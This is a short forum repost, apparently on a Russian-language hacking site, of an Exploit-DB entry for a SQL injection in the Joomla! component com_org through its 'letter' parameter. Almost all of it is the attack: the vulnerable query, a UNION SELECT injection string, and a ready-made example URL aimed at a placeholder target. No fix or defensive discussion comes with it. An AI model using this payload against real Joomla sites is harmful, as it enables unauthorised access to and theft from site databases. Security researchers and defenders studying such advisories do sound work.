Exploit Joomla! Component com_org - 'letter' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11752
Проверка EDB
  1. Пройдено
Автор
KAZUYA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-03-15
Код:
# Joomla com_org SQL Injection Vulnerability (letter parameter)
# Author: kazuya
# Mail: [email protected]<mailto:[email protected]> Jabber: [email protected]<mailto:[email protected]>
# Greetz to back2hack

# Vulnerability
# Query: SELECT count(*) FROM `jos_org` WHERE (`name` LIKE '<sql>%' || ...
# SQL: ')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f
# Example: http://[target].com/index.php?option=com_org&letter=')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f&task=indexs
 
Источник
www.exploit-db.com

Похожие темы